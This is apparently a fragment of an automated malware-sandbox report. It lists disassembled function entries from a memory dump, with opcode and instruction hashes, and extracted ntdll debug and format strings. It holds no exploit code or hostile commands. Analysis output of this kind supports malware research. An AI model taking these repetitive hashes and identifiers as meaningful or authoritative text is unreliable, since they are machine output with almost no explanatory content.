                                                                                                          • Opcode Fuzzy Hash: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                                                                                          • Instruction Fuzzy Hash: D990023228140403D145715855046065009A7D1241F95C022A0425554EC7558B56AB61
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                                                                          • Instruction ID: 07ec84986e349e873418cc0b275f2fe9209d884e2788ae7c54a8e750c7e0b0bb
                                                                                                          • Opcode Fuzzy Hash: 3da9618bc08cabd6d2e5eac18d1e773da2f57aa5b6f4fd2dfcabe849dffef6c1
                                                                                                          • Instruction Fuzzy Hash: D1900222282441535549B15855045079006A7E1241795C022A1415950CC7269956D721
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                                                                          • Instruction ID: 29aac188d4509ca1455d9230fb1b47e64c9571f2110d82886d50a520443d1671
                                                                                                          • Opcode Fuzzy Hash: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                                                                                          • Instruction Fuzzy Hash: 4290023224140843D10471585504B46500597E1301F55C026A0125654DC715C9517621
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                                                                          • Instruction ID: caf486c23f7d10561983d9f01938330bd44fdbd48d637f37d166cc29bba03e3c
                                                                                                          • Opcode Fuzzy Hash: a9959d85da86b3ab5e2137638980e18e2b1c316c6ca18cc34ce2e95ec515c454
                                                                                                          • Instruction Fuzzy Hash: 7F90023224140403D10475986508646500597E1301F55D021A5025555EC76589916231
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                                                                          • Instruction ID: 78b2b9eb1fa237f2233a76ef59166e54f4543b95492a79e5a7cdf39602d61080
                                                                                                          • Opcode Fuzzy Hash: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                                                                                          • Instruction Fuzzy Hash: 2490022264540403D14471586518706501597D1201F55D021A0025554DC7598B5567A1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                                                                                          • Instruction ID: 0030b9bab048ce429ce0b2db464ba6e72d8b04f5760cf4fb8c5a25ae1b3739fe
                                                                                                          • Opcode Fuzzy Hash: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                                                                                          • Instruction Fuzzy Hash: C890023224140403D10471586608707500597D1201F55D421A0425558DD75689516221
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                                                                          • Instruction ID: 8962f7a60ce07900451f513ede7e8aee07e69f896d8f36c8150418bfca071ff4
                                                                                                          • Opcode Fuzzy Hash: 143ea26a7016b28d0bdc6de41927e2a7a9df05cfa115d433f718bf90c54bfc7b
                                                                                                          • Instruction Fuzzy Hash: 9B90026238140443D10471585514B065005D7E2301F55C025E1065554DC719CD526226
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                                                                                          • Instruction ID: fe62917135f8277d9370e2283f53a642b8ca8257623bdac97aaefa987288aa54
                                                                                                          • Opcode Fuzzy Hash: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                                                                                          • Instruction Fuzzy Hash: F590026225140043D10871585504706504597E2201F55C022A2155554CC7298D615225
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                                                                          • Instruction ID: 13f29a008d4aff3de88beb20a29d6af7b8ac2b1267209e1b279975a7cb71e307
                                                                                                          • Opcode Fuzzy Hash: d1bbe75ac1d26b38237ee347b380b14c95d6ae1a7e2f65813a23d60f29fc8a72
                                                                                                          • Instruction Fuzzy Hash: 7390023224180403D1047158591470B500597D1302F55C021A1165555DC72589516671
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                                                                          • Instruction ID: c7573c559733c18d0b9ef95b84433b5540a2029404fa9d9445845791482fefe0
                                                                                                          • Opcode Fuzzy Hash: c9ca84d1653219d67429ab37186532159a4aea1bcc6977a0e86228c676d782ee
                                                                                                          • Instruction Fuzzy Hash: 42900222641400434144716899449069005BBE2211755C131A0999550DC75989655765
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                                                                                          • Instruction ID: 0abadae0f4569bb43f76ed64f639660d3f1e436cea46ca5ba693624b40bf1b03
                                                                                                          • Opcode Fuzzy Hash: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                                                                                          • Instruction Fuzzy Hash: D390023224180403D10471585908747500597D1302F55C021A5165555EC765C9916631
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                                                                          • Instruction ID: 1bcd6215ed89a47f4a9c973ee97d44075cf9abe8a4ec83358738595c0cacdc06
                                                                                                          • Opcode Fuzzy Hash: ee1309f940c715a6792472719e8172cdfdab6eabba6b7d5c3241aef6d70dc973
                                                                                                          • Instruction Fuzzy Hash: 3E900222251C0043D20475685D14B07500597D1303F55C125A0155554CCB1589615621
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                                                                                          • Instruction ID: b558e018a7cac82cbb0d2a815f6ceca0e96e51e2a280bc2d74cf56e17785a3ff
                                                                                                          • Opcode Fuzzy Hash: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                                                                                          • Instruction Fuzzy Hash: F290022234140403D106715855146065009D7D2345F95C022E1425555DC7258A53A232
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                                                                          • Instruction ID: 6f7163a2a037d34a09574f2cdab892ab8aa50b620f195be909f9db5538d1929b
                                                                                                          • Opcode Fuzzy Hash: 1ba55a1bb788a991ed6b0fad3871edd9e8e5f6b902f69c1397ce42d7affe2970
                                                                                                          • Instruction Fuzzy Hash: 8B90022264140503D10571585504616500A97D1241F95C032A1025555ECB258A92A231
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                                                                          • Instruction ID: a2984a9d76550ab227d15d05a84e0b9cb3e1b4e89a737c2cafba31b589a276dc
                                                                                                          • Opcode Fuzzy Hash: 96fa2e2cf2ec3f67bdb396eab522cdb9bebfa11cffcc1e19062e420e5ffc4a0d
                                                                                                          • Instruction Fuzzy Hash: A290047334140403D144715C55047475005D7D1301F55C031F5075554FC75DCFD57775
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                                                                                          • Instruction ID: 135fc5a81e36f4d6afc4f03d69dfd01745a101aff359b5fb7dd1bc3f595d7a86
                                                                                                          • Opcode Fuzzy Hash: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                                                                                          • Instruction Fuzzy Hash: 8790026224180403D14475585904607500597D1302F55C021A2065555ECB298D516235
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                                                                                          • Instruction ID: ba2ee439b051f058ac9b72c3befa8ba3ead4d6deb9d92c922ae926c20d4b3b33
                                                                                                          • Opcode Fuzzy Hash: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                                                                                          • Instruction Fuzzy Hash: 3A90022224184443D14472585904B0F910597E2202F95C029A4157554CCB1589555721
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                                                                                          • Instruction ID: 9ff1019f4df565ef91e79f655176ada9e6cf997fc154deb8236911a6644cdc5b
                                                                                                          • Opcode Fuzzy Hash: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                                                                                          • Instruction Fuzzy Hash: 6C90022228140803D144715895147075006D7D1601F55C021A0025554DC7168A6567B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                                                                          • Instruction ID: 74b9ef6855463ccaedf3495868ae146c0453b58f9c0941cad428be937e43eb05
                                                                                                          • Opcode Fuzzy Hash: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                                                                                          • Instruction Fuzzy Hash: 3990022228545103D154715C55046169005B7E1201F55C031A0815594DC75589556321
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                                                                          • Instruction ID: ebc52a100e29200ec724765ea6f91da961181937cb5dd548493885820925476b
                                                                                                          • Opcode Fuzzy Hash: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                                                                                          • Instruction Fuzzy Hash: 1090023224240143954472586904A4E910597E2302B95D425A0016554CCB1489615321
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                                                                          • Instruction ID: d39b0ae3ab75aec6a77046b35bcff3b0f27c41bf8becacb4bd7af50c9717c1df
                                                                                                          • Opcode Fuzzy Hash: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                                                                                          • Instruction Fuzzy Hash: 2490023624140403D51471586904646504697D1301F55D421A0425558DC75489A1A221
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                          • Instruction ID: 1ba76a7c44a8124a06d03aa55a5ac600dc89aa48237e38d5e859caaf06bfd800
                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                          • Instruction Fuzzy Hash:
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          • Opcode ID: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                                                                          • Instruction ID: fbf3b95a6427e36ca3ca0ef8e0a7a370e94793c7d415c7b8879e2a55fc7f33eb
                                                                                                          • Opcode Fuzzy Hash: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                                                                                          • Instruction Fuzzy Hash: C351FBB5E00116BFCB1ADB5CC89497EFBF8BF48240714816AF595D7685E374DE4087A0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                          • API String ID: 48624451-2108815105
                                                                                                          • Opcode ID: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                                                                          • Instruction ID: 18996b3cf45ba46cd745311dad0b2e806d010b8bb2895075990dbbf11974460c
                                                                                                          • Opcode Fuzzy Hash: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                                                                                          • Instruction Fuzzy Hash: B151F571A04646AECB38DF5CC8909BFBBF8EB48204B148469F5D6D7741E7B4EA41C760
                                                                                                          Strings
                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 01134787
                                                                                                          • ExecuteOptions, xrefs: 011346A0
                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01134742
                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01134655
                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011346FC
                                                                                                          • Execute=1, xrefs: 01134713
                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01134725
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                          • API String ID: 0-484625025
                                                                                                          • Opcode ID: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                                                                          • Instruction ID: 41b98b34a775e4e636076482a87e7652e30a7b191adbf4f7e6ec7e6845f1cf4c
                                                                                                          • Opcode Fuzzy Hash: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                                                                                          • Instruction Fuzzy Hash: 22511931A0021A6AEF25EBA8DC86FED77A8EF58704F0400EDD745AB5D1E7709A41CF52
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aulldvrm
                                                                                                          • String ID: +$-$0$0
                                                                                                          • API String ID: 1302938615-699404926
                                                                                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                          • Instruction ID: eeabe8a47d1a83e4402f02411c66318af36769c037ee9d8236b48dcdc7247f79
                                                                                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                          • Instruction Fuzzy Hash: 1781D378E092498EEF2FCE6CC8517FEBBB1AF45320F18455AD861A72D1C7B48940CB59
                                                                                                          Strings
                                                                                                          • RTL: Re-Waiting, xrefs: 0113031E
                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011302BD
                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011302E7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                          • API String ID: 0-2474120054
                                                                                                          • Opcode ID: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                                                                          • Instruction ID: 18a044f6b6f308b364f7cb3337da8736f8bb5a887f2a1e87bebc9e57c3e002c6
                                                                                                          • Opcode Fuzzy Hash: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                                                                                          • Instruction Fuzzy Hash: 98E190706087429FE729CF29C888B2ABBE0BF88714F144A5DF5A58B2E1D774D945CB42
                                                                                                          Strings
                                                                                                          • RTL: Resource at %p, xrefs: 01137B8E
                                                                                                          • RTL: Re-Waiting, xrefs: 01137BAC
                                                                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01137B7F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                          • API String ID: 0-871070163
                                                                                                          • Opcode ID: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                                                                          • Instruction ID: 9004b9c06e85b2910b020b3a57ca4499e4b68828d51e58053dc660a52c80193c
                                                                                                          • Opcode Fuzzy Hash: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                                                                                          • Instruction Fuzzy Hash: FF41D3357047029FD729DE29CC41B6AB7E5EF98710F100A1DEA9A9BA80DB71E4058F91
                                                                                                          APIs
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113728C
                                                                                                          Strings
                                                                                                          • RTL: Resource at %p, xrefs: 011372A3
                                                                                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01137294
                                                                                                          • RTL: Re-Waiting, xrefs: 011372C1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                          • API String ID: 885266447-605551621
                                                                                                          • Opcode ID: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                                                                          • Instruction ID: 76a9ff83bb737cb3d79a00de6cd3847aa750f2b22ef56ec07f8586dde39063bc
                                                                                                          • Opcode Fuzzy Hash: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                                                                                          • Instruction Fuzzy Hash: 4E410271700203ABD729DE29CC42F6AB7A5FF94714F10061DFA95AB680DB31F8428BD1
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___swprintf_l
                                                                                                          • String ID: %%%u$]:%u
                                                                                                          • API String ID: 48624451-3050659472
                                                                                                          • Opcode ID: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                                                                          • Instruction ID: dff2f91dd3d7c75f27f877311d446bbc30eaa769310df555791f991065951048
                                                                                                          • Opcode Fuzzy Hash: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                                                                                          • Instruction Fuzzy Hash: 83317572A002199FDB24DF2DDC40BEEB7F8EF58614F54455AE949E7240EB30AA458BA0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __aulldvrm
                                                                                                          • String ID: +$-
                                                                                                          • API String ID: 1302938615-2137968064
                                                                                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                          • Instruction ID: 5f450c6c40fd46670a887fced3e3fc4d694720ccd108c48e57e4f820ce4c57a1
                                                                                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
